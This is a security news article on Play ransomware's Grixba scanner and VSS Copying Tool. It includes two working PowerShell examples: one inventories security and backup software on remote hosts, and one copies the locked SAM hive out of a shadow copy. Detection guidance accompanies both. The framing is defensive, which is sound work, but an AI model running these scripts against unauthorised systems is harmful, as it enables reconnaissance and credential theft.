The Play ransomware group has developed two custom .NET tools, Grixba and the VSS Copying Tool, to make its attacks faster and more effective. Symantec researchers discovered and analyzed both tools and shared their findings ahead of their published report.
Grixba is a network-scanning and information-stealing tool. In its scan mode it uses WinRM, Remote Registry, Remote Services, and WMI to inventory the software running on hosts across the network.
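The following is an added example, not Grixba's code or Symantec's analysis. It reproduces the scan-mode behaviour described above on the defender's own terms: it queries remote hosts over WinRM (Invoke-Command) and WMI/CIM (Win32_Service), plus the Uninstall registry keys, and flags products matching security, backup and remote-administration vendor names. The host names and the keyword list are assumptions chosen for illustration; run it only against systems you administer.

```powershell
# Added example, not Grixba's code. Enumerates installed software on remote hosts
# over the channels the article names for Grixba's scan mode: WinRM, WMI and the
# Uninstall registry keys. Host names and vendor keywords are assumptions.
$Targets  = @('FILESRV01', 'DC01')                       # assumed host names
$Keywords = @('Defender', 'CrowdStrike', 'SentinelOne', 'Veeam', 'Acronis',
              'TeamViewer', 'AnyDesk', 'ScreenConnect')   # security / backup / remote-admin vendors

$UninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
)
$Pattern = ($Keywords | ForEach-Object { [regex]::Escape($_) }) -join '|'

foreach ($Computer in $Targets) {
    try {
        # WinRM: run the registry query on the remote host (needs WinRM enabled and admin rights)
        $Products = Invoke-Command -ComputerName $Computer -ErrorAction Stop -ScriptBlock {
            param($Keys)
            Get-ItemProperty -Path $Keys -ErrorAction SilentlyContinue |
                Where-Object { $_.DisplayName } |
                Select-Object DisplayName, DisplayVersion, Publisher
        } -ArgumentList (,$UninstallKeys)

        # WMI/CIM: service names and binary paths reveal agents the registry may not list
        $Services = Get-CimInstance -ClassName Win32_Service -ComputerName $Computer -ErrorAction Stop |
            Select-Object Name, DisplayName, State, PathName
    }
    catch {
        # A host that refuses WinRM or WMI is itself worth noting when baselining
        Write-Warning "$Computer : $($_.Exception.Message)"
        continue
    }

    $Hits = @(
        $Products | Where-Object { "$($_.DisplayName) $($_.Publisher)" -match $Pattern } |
            ForEach-Object { [pscustomobject]@{ Computer = $Computer; Source = 'Registry'
                                                Name = $_.DisplayName; Detail = $_.DisplayVersion } }
        $Services | Where-Object { "$($_.DisplayName) $($_.PathName)" -match $Pattern } |
            ForEach-Object { [pscustomobject]@{ Computer = $Computer; Source = 'Service'
                                                Name = $_.Name; Detail = "$($_.State) $($_.PathName)" } }
    )
    $Hits | Format-Table -AutoSize
}
```

Both channels leave traces on the target: a network logon (Security event 4624, logon type 3), entries in the Microsoft-Windows-WinRM/Operational log for the WinRM session, and WMI-Activity operational log entries for the CIM queries. A burst of such queries from a workstation that does not normally perform remote administration is the kind of pattern a defender can alert on.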
The VSS Copying Tool lets attackers interact with the Volume Shadow Copy Service (VSS) through AlphaVSS, an open-source .NET library that wraps the native VSS API.
Play's use of custom tooling shows the group investing in making its intrusions faster and more effective rather than relying solely on off-the-shelf utilities.
Together, the tools let attackers enumerate users and computers in a compromised network, gather information about installed security, backup, and remote administration software, and copy files out of shadow copies, which sidesteps the locks held on the live files.
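The following is an added example, not the Play group's VSS Copying Tool or Symantec's code, and it uses Windows' built-in WMI interface to VSS rather than AlphaVSS. It shows why copying from a shadow copy defeats file locks: the snapshot is a read-only, point-in-time image of the volume, so a file that is held open on the live volume reads normally from the snapshot. The volume, the locked file (the SAM hive, which Windows keeps locked while running) and the output folder are assumptions; the script needs local administrator rights and should be run only on a test system you own.

```powershell
# Added example, not the Play group's tool. Demonstrates copying a locked file
# out of a VSS snapshot using the Win32_ShadowCopy WMI class.
# Volume, file and output paths are assumptions for illustration.
#Requires -RunAsAdministrator
$Volume   = 'C:\'
$Relative = 'Windows\System32\config\SAM'   # kept locked by Windows while it runs
$OutDir   = 'C:\vss-demo'
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. A direct copy from the live volume fails because the file is in use.
try   { Copy-Item -Path (Join-Path $Volume $Relative) -Destination $OutDir -ErrorAction Stop }
catch { Write-Host "Live copy failed as expected: $($_.Exception.Message)" }

# 2. Create a snapshot of the volume (the same VSS API that AlphaVSS wraps for .NET).
$Result = Invoke-CimMethod -ClassName Win32_ShadowCopy -MethodName Create `
            -Arguments @{ Volume = $Volume; Context = 'ClientAccessible' }
if ($Result.ReturnValue -ne 0) { throw "Shadow copy creation failed, code $($Result.ReturnValue)" }
$Shadow = Get-CimInstance -ClassName Win32_ShadowCopy | Where-Object ID -eq $Result.ShadowID

# 3. The snapshot is exposed as a device object; the trailing backslash is required.
$Device = $Shadow.DeviceObject + '\'
Write-Host "Snapshot device: $Device"

# 4. Copy the locked file out of the snapshot. cmd's copy accepts the
#    \\?\GLOBALROOT device path, which the FileSystem provider does not handle reliably.
cmd.exe /c copy "$Device$Relative" "$OutDir\" | Out-Null
Get-Item (Join-Path $OutDir (Split-Path $Relative -Leaf)) | Select-Object Name, Length, LastWriteTime

# 5. Remove the snapshot again.
$Shadow | Remove-CimInstance
```

The create, copy and delete sequence above is legitimate when a backup agent does it, which is exactly why an attacker's tool blends in. A tool that calls the VSS API directly, as the Play utility does through AlphaVSS, produces no `vssadmin` or `wmic shadowcopy` command line to match on, so defenders should look for shadow copies being created and deleted by processes that are not their known backup software, and for reads of sensitive files from `\Device\HarddiskVolumeShadowCopy*` paths.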
Both tools were built with Costura, a Fody add-in that embeds the referenced assemblies into the main executable, producing a single standalone binary with no external dependencies to drop alongside it. This makes deployment on compromised systems simpler.
Play ransomware has claimed several high-profile victims since the beginning of the year, including A10 Networks, Arnold Clark, the City of Oakland in California, and Rackspace. The VSS Copying Tool in particular lets Play steal files from shadow copies even while the originals are locked by running applications.
Symantec's discovery and analysis of the two tools should help organizations strengthen their defenses against Play ransomware.